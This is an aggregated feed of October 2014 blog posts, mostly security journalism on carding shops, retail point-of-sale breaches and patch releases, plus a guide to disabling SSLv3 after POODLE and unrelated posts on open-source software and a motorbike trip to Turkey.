The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

The 2pac[dot]cc credit card shop.
The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician. Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

“Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

2pac[dot]cc’s apologetic message to would-be customers of the credit card fraud shop.
IT’S ALL ABOUT CUSTOMER SERVICE 2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically each week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves among so much choice is providing excellent customer service.

Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

Group-IB also listed the stats on how many of Rescator’s cards turned out to be useful for cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 of the 151,720 — or about 28 percent – of Rescator’s cards that were sold on Swiped1[dot]su came back as declined when run through the site’s checking service.

The swiped1[dot]su login page.
Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time. One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.


SSLv3 May Contain Traces of Bolts | 2014-10-14 23:03 UTC

UPDATE 2014-10-14 23:40 UTC The details have been published: meet the SSL POODLE attack.

UPDATE 2014-10-15 11:15 UTC Simpler server test method, corrected info about browsers

UPDATE 2014-10-15 16:00 UTC More information about client testing

El Reg posted an article earlier today about a purported flaw in SSL 3.0 which may or may not be real, but it’s been a bad year for SSL, we’re all on edge, and we’d rather be safe than sorry. So let’s take it at face value and see what we can do to protect ourselves. If nothing else, it will force us to inspect our systems and make conscious decisions about their configuration instead of trusting the default settings. What can we do?

The answer is simple: there is no reason to support SSL 3.0 these days. TLS 1.0 is fifteen years old and supported by every browser that matters and over 99% of websites. TLS 1.1 and TLS 1.2 are eight and six years old, respectively, and are supported by the latest versions of all major browsers (except for Safari on Mac OS X 10.8 or older), but are not as widely supported on the server side. So let’s disable SSL 2.0 and 3.0 and make sure that TLS 1.0, 1.1 and 1.2 are enabled.

What to do next

Test your server

The Qualys SSL Labs SSL Server Test analyzes a server and calculates a score based on the list of supported protocols and algorithms, the strength and validity of the server certificate, which mitigation techniques are implemented, and many other factors. It takes a while, but is well worth it. Anything less than a B is a disgrace.

If you’re in a hurry, the following command will attempt to connect to your server using SSL 2.0 or 3.0:

:|openssl s_client -ssl3 -connect www.example.net:443
If the last line it prints is DONE, you have work to do.

Fix your server

Disable SSL 2.0 and 3.0 and enable TLS 1.0, 1.1 and 1.2 and forward secrecy (ephemeral Diffie-Hellman).

For Apache users, the following line goes a long way:

SSLProtocol ALL -SSLv3 -SSLv2
It disables SSL 2.0 and 3.0, but does not modify the algorithm preference list, so your server may still prefer older, weaker ciphers and hashes over more recent, stronger ones. Nor does it enable Forward Secrecy.

The Mozilla wiki has an excellent guide for the most widely used web servers and proxies.

Test your client

The Poodle Test website will show you a picture of a poodle if your browser is vulnerable and a terrier otherwise. It is the easiest, quickest way I know of to test your client.

Qualys SSL Labs also have an SSL Client Test which does much the same for your client as the SSL Server Test does for your server; unfortunately, it is not able to reliably determine whether your browser supports SSL 3.0.

Fix your client

On Windows, use the Advanced tab in the Internet Properties dialog (confusingly not searchable by that name, search for “internet options” or “proxy server” instead) to disable SSL 2.0 and 3.0 for all browsers.

On Linux and BSD:

  • Firefox: open and set security.tls.version.min to 1. You can force this setting for all users by adding lockPref("security.tls.version.min", 1); to your system-wide Mozilla configuration file. Support for SSL 3.0 will be removed in the next release.

  • Chrome: open and select “show advanced settings”. There should be an HTTP/SSL section which lets you disable SSL 3.0 is apparently no way to disable SSL 3.0. Support for SSL 3.0 will be removed in the next release.

I do not have any information about Safari and Opera. Please comment (or email me) if you know how to disable SSL 3.0 in these browsers.

Good luck, and stay safe.


Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to end working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.


One month in Turkey Ultrabug | 2014-10-14 20:35 UTC

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)
Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 kms to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike even though we clearly didn’t go easy on her. We rode on gravels, dirt and mud without her complaining, not to mention the weight of our luggages and the passengers

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and freedom feeling you get when travelling in motorbike so I hope those first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.



 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

  

 

 

 

 

 

 

Kos is quite a big island that you can discover best by … riding around !



After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.



 

 

 

 

 

 

 

This is a view from the Bozburun bay. Two photos for two bike layouts : beach version and fully loaded version



 

 

 

 

 

 

 

On the way to Cappadocia, near Karapinar :



 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.



 

 

 

 

 

 

 

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.



 

 

 

 

 

 

 

 

 

 

 



Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks that targeted NATO, Ukrainian and Western government organizations, and firms in the energy sector.

More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today is available at this link.

Separately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

Otherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).


The July–September, 2014 Status Report is now available.


Ein großer Vorteil der Cisco Remote-Access VPN-Lösung war bisher, dass die Lizenzierung recht einfach war und nicht pro  PC bezahhlt werden musste, auf dem der AnyConnect Client installiert war. Natürlich gab es auch Ärgernisse, z.B. dass AnyConnect Essentials und AnyConnect Premium nicht gemischt werden konnte.

Mit den aktuellen Änderungen für den neuen AnyConnect 4 wird zwar letzteres möglich sein, allerdings wird das gesamte Lizenzmodell deutlich aufwendiger. Was sich alles ändert:
Es gibt drei neue Lizenzstufen:

  • Plus Subscription
  • Plus Perpetual
  • Apex Subscription
Subscription heißt, dass man die Lizenz mit Laufzeiten von einem, drei und fünf Jahren erwerben kann. Die Lizenzierung des Headend Termination Devices (z.B. die ASA) ist unabhängig davon.
Im AnyConnect Plus sind die folgenden Features enthalten:

  • VPN
  • per App VPN (das ist neu in v4)
  • Web Security für CWS und WSA
  • Network Access Manager
Mit Ausnahme des neuen “per App VPNs” sieht das also ziemlich nach den bisherigen Features aus.
In der neuen AnyConnect Apex Lizenz kommen die folgenden Features dazu:

  • Posture
    Das gab es zwar vorher schon, neu ist aber, dass der AnyConnect Client jetzt auch für die ISE ab der kommenden Version 1.3 benutzt werden kann. Der alte NAC Posture Agent ist nicht mehr notwendig. Das ist eine Änderung, die schon lange überfällig ist. Erstaunlich, dass mir auf der diesjährigen Cisco Networkers von einem Cisco-Mitarbeiter noch gesagt wurde, dass dies auf absehbare Zeit nicht zu erwarten sei. 
  • Next Generation Crypto / Suite B
    Für Firmen, die für anständige Crypto extra Geld verlangen fallen mir viele Worte ein. Die könnte aber alle Einfluss auf potentielle Altersbeschränkungen dieser Seite haben …
  • Clientless VPN
    Was früher per AnyConnect Premium auf dem Headend Device lizenziert wurde, ist jetzt also von der Client-Lizenz abhängig.
Mit dem neuen AnyConnect benötigt jeder Client eine Lizens:

The number of Cisco AnyConnect licenses needed is based on all the possible unique users that may use any Cisco AnyConnect service. The exact number of Plus or Apex licenses should be based on the total number of unique users that require the specific services associated with each license type.

Die kleinste Lizenz-Stufe ist jetzt für 25 Clients. Für mein Setup mit zwei Macs und auf jedem Mac drei VMs mit XP/Win7/Win8 brauche ich also schon acht Lizenzen.

Was lange überfällig war, ist dass verschiede Versionen gemischt werden können:

Cisco AnyConnect Apex and Plus licenses can be mixed in the same environment.
The number of Plus licenses can be smaller or greater than the number of Apex licenses.

Das Lizens-Management bringt uns eventuell noch ein paar „Herausforderungen“ …

When a Cisco ASA is used Cisco AnyConnect, your production activation key (PAK) for Plus or Apex must be registered to the serial number of each individual Cisco ASA via the Cisco License Management portal.

Wie das genaue Handling sein wird, vor allem wenn man Szenarien hat, bei denen ein Client auf viele verschiedene ASAs zugreift, dass muss sich noch zeigen. Ich hoffe, dass es da keine Probleme geben wird.

Die genaue Beschreibung des neuen Lizenzmodells gibt es im Cisco AnyConnect Ordering Guide.


KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.

Department of Energy’s WebEx meetings.
At issue are recurring video- and audio conference-based meetings that companies make available to their employees via WebEx, a set of online conferencing tools run by Cisco. These services allow customers to password-protect meetings, but it was trivial to find dozens of major companies that do not follow this basic best practice and allow virtually anyone to join daily meetings about apparently internal discussions and planning sessions.

Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.

Some of the more interesting, non-password-protected recurring meetings I found include those from Charles Schwab, CSC, CBS, CVS, The U.S. Department of Energy, Fannie Mae, Jones Day, Orbitz, Paychex Services, and Union Pacific. Some entities even also allowed access to archived event recordings.

Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.

“In the first week of October, we were contacted by a leading security researcher,” Cisco wrote. “He showed us that some WebEx customer sites were publicly displaying meeting information online, including meeting Time, Topic, Host, and Duration. Some sites also included a ‘join meeting’ link.”

Omar Santos, senior incident manager of Cisco’s product security incident response team, acknowledged that the company’s customer documentation for securing WebEx meetings had previously been somewhat scattered across several different Cisco online properties.  But Santos said the default setting for its WebEx meetings has always been for a password to be included on a meeting when created.

“If there is a meeting you can find online without a password, it means the site administrator or the meeting creator has elected not to include a password,” Santos said. “Only if the site administrator has elected to allow no passwords can the meeting organizer choose the ability to have no passwords on that meeting.”

Update, 11:24 a.m. ET: Cisco has published a blog post about this as well, available here.


Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there wasn’t any materials available to install Gentoo on a S390 system without having to rely in an already installed distribution.

Thanks to Marist College, IBM and Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials in their procedure.

So most of the part of last year and the last few weeks I’ve been polishing and finishing the documentation I had around. So what I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both are based in the same pattern, since

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, it’s like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system in a non-S390 system, while Hercules does.

So if you want to have some fun and emulate a S390 machine in your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo System working. Thanks to Dave Jones I was able to create the guide and test the release materials, he even did a presentation in the 2013 VM Workshop! Link to the PDF . Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuilds stage3 for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and a initramfs built with Gentoo’s genkernel based in busybox. It builds an environment using busybox like the livecd in amd64/x86 or other architectures. I’ve integrated the build of these boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!



The second RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


VDD14 Discussions: HWAccel2 Luca Barbato | 2014-10-11 14:47 UTC

I took part to the Videolan Dev Days 14 weeks ago, sadly I had been too busy so the posts about it will appear in scattered order and sort of delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers and get pixels or crunching pixels and getting numbers. Most of the operation are quite time consuming on a general purpose CPU and orders of magnitude faster if done using DSP or hardware designed for that purpose.

Availability

Most of the commonly used system have video decoding and encoding capabilities either embedded in the GPU or in separated hardware. Leveraging it spares lots of cpu cycles and lots of battery if we are thinking about mobile.

Capabilities

The usually specialized hardware has the issue of being inflexible and that does clash with the fact most codec evolve quite quickly with additional profiles to extend its capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed and need badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction addressing short term problems and not really documenting how to use it.

As result all the people that dared to use it had to guess, usually used internal symbols that they wouldn’t have to use and all in all had to spend lots of time and
had enough grief when such internals changed.

Usage
Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring to override get_format and get_buffer in some ways.

Overall to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice considering people uses libraries to abstract complexity and avoid repetition

Backend support
As that support was written with just slice-based decoder in mind, it expects that all the backend would require the software decoder to parse the bitstream, prepare slices of the frame and feed the backend with them.

Sadly new backends appeared and they take directly either bitstream or full frames, the approach had been just to take the slice, add back the bitstream markers the backend library expects and be done with that.

Initial HWAccel 2 discussion

Last year since the number of backends I wanted to support were all bitstream-oriented and not fitting the mode at all I started thinking about it and the topic got discussed a bit during VDD 13. Some people that spent their dear time getting hwaccel1 working with their software were quite wary of radical changes so a path of incremental improvements got more or less put down.

HWAccel 1.2
  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv now can use some hwaccel, providing at least an example on how to use them and a mean to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels so at least some mistakes could be avoided (and some code that happen to work by sheer look won’t break once the faulty assuptions cease to exist)
The new VDA backend and the update VDPAU backend are examples of it.

HWAccel 1.3
  • extend the callback system to fit decently bitstream oriented backends.
  • provide an example of backend directly providing normal AVFrames.
The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get further closer to the end result of not having the casual users write boilerplate code to use hwaccel to get at least some performance boost and yet let the power users have the full access to the underpinnings so they can get most of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be anymore automagic in this case, but a specific AVERROR_INPUT_CHANGED will be returned so would be cleaner for the user reset the decoder without losing the display that maybe was sharing the same context. This leads the way to a simpler mean to support multiple hwaccel backends and fall back from one to the other to eventually the software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 in general would result in less lines of code in the application, the people wanting to keep their callback need to just set them after avcodec_open2 and move the pixel specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make much simpler managing the backend specific resources.

Expected Time of Arrival

Right now the review is on the HWaccel1.3, I hope to complete this step and add few new backends to test how good/bad that API is before adding the other steps. Probably HWAccel2 will take at least other 6 months.

Help in form of code or just moral support is always welcome!


Netflix on Gentoo Mike Pagano's Weblog | 2014-10-11 13:11 UTC

Contrary to some articles you may read on the internet, NetFlix is working great on Gentoo.

Here’s a snap shot of my system running 3.12.30-gentoo sources and google chrome version 39.0.2171.19_p1.



 

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

 



Sears Holding Co. late Friday said it recently discovered that point-of-sale registers at its Kmart stores were compromised by malicious software that stole customer credit and debit card information. The company says it has removed the malware from store registers and contained the breach, but that the investigation is ongoing.

“Yesterday our IT teams detected that our Kmart payment data systems had been breached,” said Chris Brathwaite, spokesman for Sears. “They immediately launched a full investigation working with a leading IT security firm. Our investigation so far indicates that the breach started in early September.”

According to those investigators, Brathwaite said, “our systems were infected with a form of malware that was currently undetectable by anti-malware systems. Our IT teams quickly removed that malware, however we do believe that debit and credit card numbers have been compromised.”

Brathwaite stressed that the data stolen included only “track 2″ data from customer credit and debit cards, and did not include customer names, email address, physical address, Social Security numbers, PINs or any other sensitive information.

However, he acknowledged that the information stolen would allow thieves to create counterfeit copies of the stolen cards. So far, he said, Sears has no indication that the cards are yet being fraudulently used.

Sears said it has no indication that any Sears, Roebuck customers were impacted, and that the malware infected the payment data systems at Kmart stores only.

More on this developing story as updates become available. For now, see this notice on Kmart’s home page.


Nationwide fast-food chain Dairy Queen on Thursday confirmed that malware installed on cash registers at some 395 stores resulted in the theft of customer credit and debit card information. The acknowledgement comes nearly six weeks after this publication first broke the news that multiple banks were reporting indications of a card breach at Dairy Queen locations across the country.

In a statement issued Oct. 9, Dairy Queen listed nearly 400 DQ locations and one Orange Julius location that were found to be infected with the widely-reported Backoff malware that is targeting retailers across the country.

Curiously, Dairy Queen said that it learned about the incident in late August from law enforcement officials. However, when I first reached out to Dairy Queen on Aug. 22 about reports from banking sources that the company was likely the victim of a breach, the company said it had no indication of a card breach at any of its 4,500+ locations. Asked about the apparent discrepancy, Dairy Queen spokesman Dean Peters said that by the time I called the company and inquired about the breach, Dairy Queen’s legal team had indeed already been notified by law enforcement.

“When I told you we had no knowledge, I was being truthful,” Peters said. “However, I didn’t know at that time that someone [from law enforcement] had already contacted Dairy Queen.”

In answer to inquiries from this publication, Dairy Queen said its investigation revealed that the same third-party point-of-sale vendor was used at all of the breached locations, although it declined to name the affected vendor. However, multiple sources contacted by this reporter said the point-of-sale vendor in question was Panasonic Retail Information Systems.

In response to questions from KrebsOnSecurity, Panasonic issued the following non-denial statement:

“Panasonic is proud that we can count Dairy Queen as a point-of-sale hardware customer. We have seen the media reports this morning about the data breaches in a number of Dairy Queen outlets. To the best of our knowledge, these types of malware breaches are generally associated with network security vulnerabilities and are not related to the point-of-sale hardware we provide. Panasonic stands ready to provide whatever assistance we can to our customers in resolving the issue.”

The Backoff malware that was found on compromised Dairy Queen point-of-sale terminals is typically installed after attackers compromise remote access tools that allow users to connect to the systems over the Internet. All too often, the user accounts for these remote access tools are protected by weak or easy-to-guess username and password pairs.

The incident at DQ fits a pattern of breaches involving retail chains that rely heavily on franchisees and poorly-secured point-of-sale products which allow remote access over the Internet. On Sept. 24, nationwide sandwich chain Jimmy John’s confirmed reports first published in this blog about a likely point-of-sale breach at the company’s stores. While there are more than 1,900 franchised Jimmy John’s locations, only 216 were hit, and they were all running the same point-of-sale software from Newtown, Pa. based Signature Systems. On Sept. 26, Signature disclosed that at least 100 other mom-and-pop restaurants that it serves were compromised through its point-of-sale systems.

Earlier in September, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.

Dairy Queen said that it will be offering free credit monitoring services to affected customers. This has become the standard response for companies trying to burnish their public image in the wake of a card breach, even though credit monitoring services do nothing to help consumers detect or prevent fraud on existing accounts — such as credit and debit cards.

There is no substitute for monitoring your monthly bank and credit card statements for unauthorized or suspicious transactions. If you’re looking for information about how to protect yourself or loved ones from identity thieves, check out the tips in the latter half of this article.


Computer and software industry maker HP is in the process of notifying customers about a seemingly harmless security incident in 2010 that nevertheless could prove expensive for the company to fix and present unique support problems for users of its older products.

Earlier this week, HP quietly produced several client advisories stating that on Oct. 21, 2014 it plans to revoke a digital certificate the company previously used to cryptographically sign software components that ship with many of its older products. HP said it was taking this step out of an abundance of caution because it discovered that the certificate had mistakenly been used to sign malicious software way back in May 2010.

Code-signing is a practice intended to give computer users and network administrators additional confidence about the integrity and security of a file or program. Consequently, private digital certificates that major software vendors use to sign code are highly prized by attackers, because they allow those attackers to better disguise malware as legitimate software.

For example, the infamous Stuxnet malware – apparently created as a state-sponsored project to delay Iran’s nuclear ambitions — contained several components that were digitally signed with certificates that had been stolen from well-known companies. In previous cases where a company’s private digital certificates have been used to sign malware, the incidents were preceded by highly targeted attacks aimed at stealing the certificates. In Feb. 2013, whitelisting software provider Bit9 discovered that digital certificates stolen from a developer’s system had been used to sign malware that was sent to several customers who used the company’s software.

But according to HP’s Global Chief Information Security Officer Brett Wahlin, nothing quite so sexy or dramatic was involved in HP’s decision to revoke this particular certificate. Wahlin said HP was recently alerted by Symantec about a curious, four-year-old trojan horse program that appeared to have been signed with one of HP’s private certificates and found on a server outside of HP’s network. Further investigation traced the problem back to a malware infection on an HP developer’s computer.

HP investigators believe the trojan on the developer’s PC renamed itself to mimic one of the file names the company typically uses in its software testing, and that the malicious file was inadvertently included in a software package that was later signed with the company’s digital certificate. The company believes the malware got off of HP’s internal network because it contained a mechanism designed to transfer a copy of the file back to its point of origin.



Wahlin stressed that the software package in question was never included in software that was shipped to customers or put into production. Further, he said, there is no evidence that any of HP’s private certs were stolen.

“When people hear this, many will automatically assume we had some sort of compromise within our code signing infrastructure, and that is not the case,” he said. “We can show that we’ve never had a breach on our [certificate authority] and that our code-signing infrastructure is 100 percent intact.”

Even if the security concerns from this incident are minimal, the revocation of this certificate is likely to create support issues for some customers. The certificate in question expired several years ago, and so it cannot be used to digitally sign new files. But according to HP, it was used to sign a huge swath of HP software — including crucial hardware and software drivers, and other components that interact in fundamental ways with the Microsoft Windows operating system.

Thus, revoking the certificate means that HP must re-sign software that is already in use. Wahlin said most customers impacted by this change will merely encounter warnings from Windows if they try to reinstall certain drivers from original installation media, for example. But a key unknown at this point is how this move will affect HP computers that have built-in “recovery partitions” — small sections at the beginning of the computer’s hard drive that can be used to restore the system to its original, factory-shipped software configuration.

“The interesting thing that pops up here — and even Microsoft doesn’t know the answer to this — is what happens to systems with the restore partition, if they need to be restored,” Wahlin said. “Our PC group is working through trying to create solutions to help customers if that actually becomes a real-world scenario, but in the end that’s something we can’t test in a lab environment until that certificate is officially revoked by Verisign on October 21.”


Ein Tag am Meer My Universe | 2014-10-09 17:49 UTC

